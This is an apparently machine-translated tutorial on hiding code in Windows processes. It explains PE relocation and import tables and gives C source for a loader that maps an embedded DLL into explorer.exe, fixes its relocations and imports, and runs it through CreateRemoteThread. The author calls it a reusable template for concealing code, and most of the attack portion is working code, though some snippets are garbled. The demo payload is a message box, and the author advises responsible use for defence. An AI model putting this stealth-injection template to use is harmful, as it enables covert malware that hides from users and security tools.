Hiding processes in the NT environment means that there are many ways to execute your code without your knowledge, such as using the registry to insert DLL, and using Windows hooks. The typical examples are the loadlibrary method introduced by Jeffrey richer in Windows core programming and the method described by Luo yunbin in Windows 32-bit assembly language programming. The common features of the two methods are that the remote thread is used to execute the Code as the thread of the host process in the address space of the host process, so as to achieve the purpose of hiding. In comparison, richer's method is easier to understand and implement because it can be completed in C/C ++ and other advanced languages. However, it allows the host process to use loadlibrary to load new DLL, therefore, it is inevitable that the hidden effect is not perfect. Luo yunbin's method is absolutely first-class in terms of hiding effects. However, it is difficult to implement it because he uses an assembly language (at least I cannot write the assembly program :)). The method described below can be considered to be a combination of the above two Methods: Using C/C ++ encoding to achieve full hiding. In addition, the method greatly simplifies the compilation of remote thread Code, making it difficult to write basically the same as that of a common program.
Basic knowledge
It is a good idea to make your code the thread of the host process and execute it in the address space of the host process. However, if you want to put programs in the address space of other processes to run, you will face a severe problem: how to implement code relocation. For more information about relocation, see the following program:
... Int func () // function func definition... Int A = func (); // call to func... After compilation, this program may look like the following :... 0x00401800: Push EBP // This is the function func entry 0x00401801: mov EBP, esp... 0x00402000: Call 00401800 // call the function func 0x00402005: mov dword ptr [ebp-08], eax...
Note the direct addressing command "Call 00401800" at "0x00402000 ". When the above program runs normally (loaded and executed by Windows), because the file header of the PE file contains sufficient information, therefore, the system can load the code to a proper location to ensure that the address "00401800" is the function func entry. However, when we mount the program into the address space of other processes, we cannot guarantee this. The final result may be as follows:
... 0x00801800: Push EBP // This is the function func entry 0x00801801: mov EBP, esp... 0x00802000: Call 00401800 // What is 0x00401800: mov dword ptr [ebp-08], eax...
Obviously, running the above Code will produce unpredictable results (the biggest possibility is that the thread that executes the code that we have to load with all the hardships will be killed by the system together with the host process ). I do not know whether the dynamic link library (DLL) is loaded in the system. When a DLL is loaded into different processes, the address of the DLL may be different, therefore, in this case, the system must also solve the problem of direct addressing instruction relocation in DLL. Originally, most dll contains some data inserted by the compiler for relocation, which forms a relocation table. The system modifies the DLL code based on the data in the relocation table to complete the relocation. Richer's loadlibrary also borrowed this. Therefore, our relocation method is to complete the work for the system and relocate the system based on the data in the relocation table. In this case, let's take a look at table relocation.
First, analyze the information to be saved in the relocation table. The preceding code is used as an example. To make the code run correctly, you must change "Call 00401800" to "Call 00801800 ". This change requires two pieces of data. The first is the change, that is, the data in the memory address, which is "0x00802001" (not "0x00802000"). The second is how to change it, that is, how much data should be added to the location. Here is "0x00400000 ". The second data can be calculated from the actual DLL load address and the suggested load address, as long as the former is reduced by the latter. The actual Mount address will be known when it is loaded, and it is recommended that the Mount address be recorded in the imagebase field of the file header. Therefore, in summary, the information to be saved in the relocation table is the address of the data to be corrected.
Location |
Data |
Description |
0000 h |
00001000 H |
Page start address (RVA) |
0004 H |
00000010 H |
Relocation block Length |
0008 H |
3006 H |
The first relocation item, which must be corrected for 32 bits |
000ah |
300dh |
The second relocation item, which must be corrected for 32 bits |
000ch |
3015 H |
The third relocation item, which must be corrected for 32 bits |
000eh |
0000 h |
Fourth relocation item for alignment |
0010 H |
00003000 H |
Page start address (RVA) |
0014 H |
0000000ch |
Relocation block Length |
0018 H |
3008 H |
The first relocation item, which must be corrected for 32 bits |
001ah |
302ah |
The second relocation item, which must be corrected for 32 bits |
... |
... |
Other relocation Blocks |
0100 H |
0000 h |
Relocation table end mark |
Now that we know what information should be stored in the relocation table, let's take a look at how the relocation table in the PE file stores this information. The location and size of the relocation table can be obtained from the sixth image_data_directory structure in the data directory of the PE file header. Because recording a Code address to be corrected requires a dual-character (32-bit) storage space, and there are many direct addressing commands in the program, in order to save storage space, windows compresses the relocated table and stores it in blocks (4 K. Addressing a page requires only 12-bit data. Adding the 12-bit data and four other data to 16-bit data constitutes a relocation item. Append a dual character to all the relocation items on each page to indicate the start address of the page, and the other dual character to indicate the length of the local relocation block, you can record all the addresses on the page to be relocated. All the relocation blocks are arranged in sequence, and the relocation table is ended at the beginning of a page with the address 0. The preceding table is an example of a relocation table (each color in the table represents a relocation block ).
As mentioned above, each relocation item also contains four other information. These four locations are the four-digit height of the relocation item. Although there are four locations, we can see that there are only two values: 0 and 3. 0 indicates that this item is only used for alignment and has no other meaning. 3 indicates that the 32-bit double-character pointing to the relocated address must be corrected. Note that the initial page address is a relatively virtual address (RVA). You must add the Mount address to obtain the actual page address. For example, the first relocation item in the table above indicates that the data to be relocated is located at the address (assuming the loading address is 00400000 h): loading address (00400000 h) + page address (1000 h) + page address (0006 H) = 00401006 H.
Now, the relocation problem has been solved. It should be said that now we can start encoding. However, I wonder if you have read other articles about process hiding (with exceptions similar to Jeffrey richer) and notice that they always call windows APIs in an explicit link, for example, the following is a call to MessageBox:
// Fnloadlibrary and fngetprocaddress point to the Windows API functions loadlibraryw and getprocaddress respectively.
typedef int (WINAPI *FxMsgBox)(HWND, LPCWSTR, LPCTSTR, UINT); … HMODULE hUser32 = fnLoadLibrary(L"User32.dll"); FxMsgBox fnMsgBox = (FxMsgBox)(fnGetProcAddress(hUser32, "MessageBoxW")); fnMsgBox(…); …
Why don't they use simpler implicit links? Originally, to implicitly link the DLL and call the output function, you must first ensure that the DLL has been loaded when the program is running; otherwise, an error occurs. Second, the command format for Calling API functions is generally: Call dword ptr [XXXXXXXX]. To make the program run normally, you must enter the entry address of the target function in "XXXXXXXX" before calling the function. When the program is loaded normally, the system will ensure these two points. However, you have to load the program on your own to ensure that these two points are troublesome, so they generally use explicit links to bypass these two issues.
If you don't care about using a typedef and a getprocaddress for each API (maybe there is another loadlibrary), it is enough to use an explicit link. But imagine the actual situation: it is common to call dozens or even hundreds of APIs in your code, writing these repetitive code for each API makes programming boring. Therefore, we must solve these two problems and use implicit links. The idea of solving the implicit link problem is the same as that in the previous troubleshooting of the relocation problem, that is, to complete the work for the system, before the remote thread code calls the first API, load the DLL and fill in the corresponding entry address.
// Excerpt from winnt. h typedef struct _ operator {Union {DWORD characteristics; DWORD character ;}; DWORD timedatestamp; DWORD forwarderchain; DWORD name; DWORD firstthunk;} image_import_descriptor;
Let's take a look at the input table of the basic knowledge PE file. The input table records the names of all DLL files implicitly loaded by a Win32 program and the function names of the APIS introduced from them. The second image_data_directory in the data directory of the PE file header is used, we can obtain the location and size of the input table. In fact, the input table is an array composed of image_import_descriptor structures. Each structure corresponds to a DLL file to be implicitly loaded. The entire input table ends with image_import_descriptor with a characteristics field of 0. The above is the definition of the image_import_descriptor structure.
The name field is an RVA that points to the DLL file name corresponding to this structure. The file name is a string ending with null. In the PE file, originalfirstthunk and firstthunk are both RVA, pointing to two arrays of image_thunk_data structures with identical content. Each structure corresponds to an introduced function, the entire array uses an image_thunk_data structure whose content is 0 as the end mark. The image_thunk_data structure is defined as follows:
// From winnt. h typedef struct _ operator {Union {DWORD forwarderstring; // pbyte DWORD function; // pdword DWORD ordinal; DWORD addressofdata; // operator} U1;} image_thunk_data32; typedef incluimage_thunk_data;
From the above definition, we can see that the image_thunk_data structure can be used as a DWORD. When the maximum value of DWORD is 1, it indicates that the function is introduced in the form of serial number; otherwise, the function is introduced in the form of function name, and this DWORD is an RVA, point to an image_import_by_name structure. We can use the pre-defined constant image_ordinal_flag in winnt. h to test whether the maximum bit is 1. The image_import_by_name structure is defined as follows:
// Excerpt from winnt. h typedef struct _ image_import_by_name {word hint; byte name [1];} image_import_by_name;
The content of the hint field is optional. If it is not 0, it also indicates the serial number of the function. We do not have to consider it for programming. Although the name array in the above definition only contains one element, it is actually a variable-length array that stores a string ending with null, that is, the function name.
Maybe the above explanation has made you dizzy. Let's take a look at the actual structure of the import table below. I hope it will help you stay awake:
Looking at the previous explanation, you may have a question: Since originalfirstthunk and firstthunk point to exactly the same content, can you just use one? Well, do not doubt the Windows designers. They are indeed the same in PE files, but when the files are loaded into the memory, the difference arises: originalfirstthunk content will not change, however, the data in firstthunk will become the corresponding function entry address. Shows the structure of the input table in the memory:
In fact, "XXXXXXXX" in the call dword ptr [XXXXXXXX] command mentioned above is the address of image_thunk_data in firstthunk, the image_thunk_data is saved after being loaded as the entry address of the corresponding function. I know what is going on with dynamic links!
Programming implementation
So far, the basic knowledge about process hiding has been completed. Next we will start programming. I will describe other issues with the code.
We need to write two programs, one is DLL, which contains the code and data to be inserted into the host process; the other is the loader program, it will load the DLL into the host process and run the code by creating a remote thread. For better hiding, I added the compiled dll as a resource to the loader. In the course of study, I chose javaser.exe, because it is available in every Windows system. After the loader is running, the remote thread will pop up as a message box to prove that the code is successfully inserted.
The two programs have a common header file "threadparam. H ", I defined the structure of the parameter to be passed to the remote thread in it. This structure includes two function pointers, they will point to the Windows API "loadlibrary" and "getprocaddress" respectively, and a pointer to the image base address of the remote thread in the target process, which will be described in detail later, the following is "threadparam. H "content:
typedef HMODULE (WINAPI *FxLoadLibrary)(LPCSTR lpFileName); typedef FARPROC (WINAPI *FxGetProcAddr)(HMODULE hModule, LPCSTR lpProcName); typedef struct tagTHREADPARAM { FxLoadLibrary fnLoadLibrary; FxGetProcAddr fnGetProcAddr; LPBYTE pImageBase; }THREADPARAM, *PTHREADPARAM;
Let's first look at the loader program. This section also covers other PE file formats. I will not describe them in detail due to space limitations. Please refer to the relevant materials. At the same time, in order to make the program more short, I assume it never fails and removes all the code used for error handling.
First, we will introduce the global variables and constants used in the program. "_ Pinh" points to the PE file header of the DLL embedded in the loader for use as needed. The next four macros are defined for the convenience of program writing. "image_size" indicates the DLL image size, that is, the size of memory to be opened in the host process; "rva_export_tabel" indicates the RVA address of the DLL output table; "rva_reloc_tabel" indicates the RVA address of the DLL relocation table; "process_open_mode" indicates the method to open the host process, only in this way, we can complete all necessary work.
static PIMAGE_NT_HEADERS _pinh = NULL; #define IMAGE_SIZE (_pinh->OptionalHeader.SizeOfImage) #define RVA_EXPORT_TABEL (_pinh->OptionalHeader.DataDirectory[0].VirtualAddress) #define RVA_RELOC_TABEL (_pinh->OptionalHeader.DataDirectory[5].VirtualAddress) #define PROCESS_OPEN_MODE (PROCESS_CREATE_THREAD|PROCESS_VM_WRITE|PROCESS_VM_OPERATION)
The following is the definition of the main function, from which we can see the general steps, the serial number in the comment indicates the start position of each step.
int APIENTRY _tWinMain(HINSTANCE hInst, HINSTANCE, LPTSTR lpCmdLine, int nCmdShow) { LPTHREAD_START_ROUTINE pEntry = NULL; PTHREADPARAM pParam = NULL; LPBYTE pImage = (LPBYTE)MapRsrcToImage(); //① DWORD dwProcessId = GetTargetProcessId(); //② HANDLE hProcess = OpenProcess(PROCESS_OPEN_MODE, FALSE, dwProcessId); LPBYTE pInjectPos = (LPBYTE)VirtualAllocEx(hProcess, NULL, IMAGE_SIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE); PrepareData(pImage, pInjectPos, (PVOID*)&pEntry, (PVOID*)&pParam); //③ WriteProcessMemory(hProcess, pInjectPos, pImage, IMAGE_SIZE, NULL); //④ HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, pEntry, pParam, 0, NULL); CloseHandle(hThread); //⑤ CloseHandle(hProcess); VirtualFree(pImage, 0, MEM_RELEASE); return 0; }
Step 1: map the DLL file in the resource to the memory to form an image. This step is completed by the "maprsrctoimage" function. It first opens the DLL in the resource, finds the PE file header of the DLL, and points the global variable _ pinh to it. Then, it is implemented in the loader process based on the "sizeofimage" field in the file header (for convenience, our data preparation work is all implemented in the loader process, only to the end, to write the prepared data to the host process at one time.) Open up enough memory space to store the DLL memory image. The operations for ing DLL to memory are performed in units of segments. The segment table (image_section_header) in the PE File) provides information such as the size of each section, the location in the file, and the location (RVA) to be placed in the memory. The file header does not belong to any section. We place its data in the starting position of the memory area (this is because it will be explained when introducing the DLL program ).
Static lpbyte maprsrctoimage () // map the DLL in the resource to the memory {hrsrc = findresource (null, _ T ("rtdll"), _ T ("rt_dll ")); hglobal = loadresource (null, hrsrc); lpbyte prsrc = (lpbyte) lockresource (hglobal); _ pinh = (pimage_nt_headers) (prsrc + (pimage_dos_header) prsrc) -> e_lfanew); lpbyte pimage = (lpbyte) virtualalloc (null, image_size, mem_commit, page_readwrite); DWORD dwsections = _ pinh-> fileheader. numberofsections; DWORD dwbytes2copy = (lpbyte) _ pinh)-prsrc) + sizeof (image_nt_headers); required pish = (pimage_section_header) (prsrc + dwbytes2copy ); dwbytes2copy ++ = dwsections * sizeof (image_section_header); memcpy (pimage, prsrc, dwbytes2copy); For (DWORD I = 0; I> dwsections; I ++, pish ++) {lpbyte psrc = prsrc + Pish-> pointertorawdata; lpbyte pdest = pimage + Pish-> virtualaddress; region = Pish-> sizeofrawdata; memcpy (pdest, psrc, dwbytes2copy );} _ pinh = (pimage_nt_headers) (pimage + (pimage_dos_header) pimage)-> e_lfanew); Return pimage ;}
Step 2: Open the host process and open the memory space used to write data. This step is relatively simple, in which the gettargetprocessidhandler is used to obtain the process ID of assumer.exe.
Static DWORD gettargetprocessid () // obtain the PID of the explorer process {DWORD dwprocessid = 0; hwnd = findwindow (_ T ("progman "), _ T ("program manager"); getwindowthreadprocessid (hwnd, & dwprocessid); Return dwprocessid ;}
Step 3: Prepare the data to be written to the host process. In this step, we need to relocate the DLL image created in ① according to the base address of the bucket opened in ②, prepare parameters for the thread, and calculate the thread entry address.
static void PrepareData(LPBYTE pImage, LPBYTE pInjectPos, PVOID* ppEntry, PVOID* ppParam) { LPBYTE pRelocTbl = pImage + RVA_RELOC_TABEL; DWORD dwRelocOffset = (DWORD)pInjectPos - _inh.OptionalHeader.ImageBase; RelocImage(pImage, pRelocTbl, dwRelocOffset); PTHREADPARAM param = (PTHREADPARAM)pRelocTbl; HMODULE hKernel32 = GetModuleHandle(_T("kernel32.dll")); param->fnGetProcAddress=(FxGetProcAddress)GetProcAddress(hKernel32,"GetProcAddress"); param->fnLoadLibrary= (FxLoadLibrary)GetProcAddress(hKernel32, "LoadLibraryA"); param->pImageBase = pInjectPos; *ppParam = pInjectPos + RVA_RELOC_TABEL; *ppEntry = pInjectPos + GetEntryPoint(pImage); }
First, it calculates the value to be added to the relocated data based on the actual loading address and the suggested address, and then calls the "relocimage" function to perform the relocation operation. "Relocimage" is mainly used to relocate the DLL Image Based on the structure of the relocation table described above. Are you surprised to read the "relocimage" code? We have spent so much effort to illustrate the relocation problem, but it only requires such a few lines of programs to implement it! In fact, this shows that the PE file format is very simple and we do not need to fear it. The code processing the implicit link later proves this point again.
static void RelocImage(PBYTE pImage, PBYTE pRelocTbl, DWORD dwRelocOffset) { PIMAGE_BASE_RELOCATION pibr = (PIMAGE_BASE_RELOCATION)pRelocTbl; while(pibr->VirtualAddress != NULL) { WORD* arrOffset = (WORD*)(pRelocTbl + sizeof(IMAGE_BASE_RELOCATION)); DWORD dwRvaCount = (pibr->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / 2; for(DWORD i=0; i<dwRvaCount; i++ ) { DWORD dwRva = arrOffset[i]; if((dwRva & 0xf000) != 0x3000) continue; dwRva &= 0x0fff; dwRva += pibr->VirtualAddress + (DWORD)pImage; *(DWORD*)dwRva += dwRelocOffset; } pRelocTbl += pibr->SizeOfBlock; pibr = (PIMAGE_BASE_RELOCATION)pRelocTbl; } }
Since the memory allocated in the host process is only as large as image_size, the thread parameters must be written after the relocation operation is completed. This is because after the relocation of the table is completed, it's useless. We can just borrow its space to store thread parameters. In general, the space is enough unless you need to pass a lot of parameters. In this way, the address of the parameter is naturally the actual Mount address plus the RVA address of the relocation table.
The final task is to obtain the thread entry address, which is completed by the function "getentrypoint. Our DLL program outputs a function named "threadentry". Its prototype is compatible with the Windows Thread entry function. We use it as the execution body of remote threads. Getentrypoint finds the threadentry address from the Image Based on the DLL output table information and returns it. However, the address returned by "getentrypoint" is an RVA, and the Mount address "pinjectpos" must be added as the actual entry address.
static DWORD GetEntryPoint(LPBYTE pImage) { DWORD dwEntry = 0, index = 0; IMAGE_EXPORT_DIRECTORY* pied = (IMAGE_EXPORT_DIRECTORY*)(pImage + RVA_EXPORT_TABEL); DWORD* pNameTbl = (DWORD*)(pImage + pied->AddressOfNames); for(index=0; index<pied->NumberOfNames; index++, pNameTbl++) if(strcmp("ThreadEntry", (char*)(pImage + (*pNameTbl))) == 0) { index = ((WORD*)(pImage + pied->AddressOfNameOrdinals))[index]; dwEntry = ((DWORD*)(pImage + pied->AddressOfFunctions))[index]; break; } return dwEntry; }
Step 4: Write the prepared data to the host process and create a remote thread to run the written code.
Step 5: Clean Up the loader before the end.
The above is all about the loader program. Next we will introduce the DLL program. As mentioned above, DLL outputs a function named "threadentry" as the remote thread entry, so we start with "threadentry.
extern DWORD ThreadMain(HINSTANCE hInst); DWORD WINAPI ThreadEntry(PTHREADPARAM pParam) { DWORD dwResult = -1; __try{ if(LoadImportFx(pParam->pImageBase, pParam->fnLoadLibrary, pParam->fnGetProcAddr)) dwResult = ThreadMain((HINSTANCE)pParam->pImageBase); } __except(EXCEPTION_EXECUTE_HANDLER) { dwResult = -2; } return dwResult; }
The entire threadentry code is included in a Seh (structured exception handling), which can avoid the host being killed by the system due to parasitic code errors. Threadentry first calls the loadimportfx function to handle the implicit link DLL.
The working principle of loadimportfx is to use loadlibrary to load the DLL file according to the structure of the input table described above, and then use getprocaddress to obtain the entry address of the Input Function and write it into the corresponding image_thunk_data. Here I want to explain: Why can remote threads use the loadlibrary and getprocaddress entry addresses in the loader process to call these two functions? As mentioned above, we cannot guarantee that the DLL containing the two functions has been loaded, and that their pointing correctness cannot be ensured. In fact, I have used two facts in Windows: basically, all Windows processes are installed with kernel32.dll.pdf (on my machine, only smss.exe is supported), and these two functions are located in "kernel32.dll; the other is that all processes that load "kernel32.dll" will load it into the same memory address, because it is one of the most basic DLL in windows. Therefore, in most cases, I do not have any problems.
BOOL LoadImportFx(LPBYTE pBase, FxLoadLibrary fnLoadLibrary, FxGetProcAddr fnGetProcAddr) { PIMAGE_DOS_HEADER pidh = (PIMAGE_DOS_HEADER)pBase; PIMAGE_NT_HEADERS pinh = (PIMAGE_NT_HEADERS)(pBase + pidh->e_lfanew); PIMAGE_IMPORT_DESCRIPTOR piid = (PIMAGE_IMPORT_DESCRIPTOR) (pBase + pinh->OptionalHeader.DataDirectory[1].VirtualAddress); for(; piid->OriginalFirstThunk != 0; piid++) { HMODULE hDll = fnLoadLibrary((LPCSTR)(pBase + piid->Name)); PIMAGE_THUNK_DATA pOrigin = (PIMAGE_THUNK_DATA)(pBase + piid->OriginalFirstThunk); PIMAGE_THUNK_DATA pFirst = (PIMAGE_THUNK_DATA)(pBase + piid->FirstThunk); LPCSTR pFxName = NULL; PIMAGE_IMPORT_BY_NAME piibn = NULL; for(; pOrigin->u1.Ordinal != 0; pOrigin++, pFirst++) { if(pOrigin->u1.Ordinal & IMAGE_ORDINAL_FLAG) pFxName = (LPCSTR)IMAGE_ORDINAL(pOrigin->u1.Ordinal); else { piibn = (PIMAGE_IMPORT_BY_NAME)(pBase + pOrigin->u1.AddressOfData); pFxName = (LPCSTR)piibn->Name; } pFirst->u1.Function = (DWORD)fnGetProcAddr(hDll, pFxName); } } return TRUE; }
After the implicit link is processed, threadentry calls threadmain to complete the actual work of the remote thread. You may have noticed that threadmain has a parameter of the hinstance type, but it can be seen from threadentry that it is actually the DLL loading address in the host. Why can this be done? The answer is: I don't know. Ask Microsoft. However, I have observed that the handle of any module in a common program is the address of the module, so I will draw a picture. This also explains the reason why the file header is placed in the base address of the image when the previous process is relocated-the system requires the file header information and I must prepare it for it (although the loadimportfx function also needs the file header to locate the input table, but it is not the root cause, because it can be used in other ways ).
Below is my threadmain, which pops up the message box mentioned above. See it? You can write remote thread code like a common program. There is no complicated self-positioning, and there is no annoying explicit link. This is a wonderful world!
Summary
This article simplifies the process hiding technology to a considerable extent. You can even use it as a template and just implement a threadmain to hide the code to other processes as you want. However, this is by no means the purpose of writing this article. I hope that the reader will only regard it as a technology and deepen his understanding of the Windows system. In fact, the processing of dynamic links in this article is far from reaching the operating system level. For example, the data directory of the PE file currently uses 15 items, but this article only processes four items: output table, input table, relocation table, and IAT (can be considered as part of the input table). If you do not finish all 15 items, the remote code may behave differently from the normal situation. I hope to work with readers to continuously improve this technology and use it responsibly to better prevent and control malicious code.